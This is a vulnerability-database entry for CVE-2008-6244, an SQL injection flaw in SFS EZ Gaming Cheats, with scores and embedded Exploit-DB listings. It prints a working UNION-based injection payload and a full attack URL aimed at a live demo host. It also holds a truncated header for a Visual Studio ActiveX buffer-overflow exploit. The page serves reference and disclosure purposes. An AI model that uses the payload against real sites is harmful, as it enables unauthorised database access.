CVE-2008-6244
published 2009-02-23CVE-2008-6244: SQL injection vulnerability in view_reviews.php in Scripts for Sites (SFS) EZ Gaming Cheats allows remote attackers to execute arbitrary SQL commands via the…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.00%
58.4th percentile
SQL injection vulnerability in view_reviews.php in Scripts for Sites (SFS) EZ Gaming Cheats allows remote attackers to execute arbitrary SQL commands via the id parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SFS EZ Gaming Cheats - SQL Injection
exploitdb·2008-11-01
CVE-2008-6244 SFS EZ Gaming Cheats - SQL Injection
SFS EZ Gaming Cheats - SQL Injection
---
[~] SFS EZ Gaming Cheats remote sql inj
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 01.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q kpss : ) )
[~]
[~] -----------------------------------------------------------
Exploit:
http://localhost/script_path/view_reviews.php?id=[SQL]
[SQL]=
-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
demo
http://turnkeyzone.com/demos/cheats/view_reviews.php?id=-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
[~]--------------------------------------------------
Exploit-DB
Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow
exploitdb·2008-08-26
CVE-2008-3704 Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow
Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow
---
Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote Buffer Overflow Exploit
Author: Koshi
Original POC: http://www.milw0rm.com/exploits/6244 ( Not by me )
My first ActiveX exploit, learned quite a bit playing with this one.
Heaps are handy.
#################################################
Loaded File: C:\WINDOWS\system32\MSMASK32.OCX
Name: MSMask
Version: 1.1
Class MaskEdBox
GUID: {C932BA85-4374-101B-A56C-00AA003668DC}
Number of Interfaces: 1
Default Interface: IMSMask
RegKey Safe for Script: False
RegKey Safe for Init: True
KillBitSet: False
#################################################
gr33tz: Rima my baby, str0ke, mess, and to all of those who have helped me over the years!
function doIt()
{
var
No writeups or analysis indexed.
2009-02-23
Published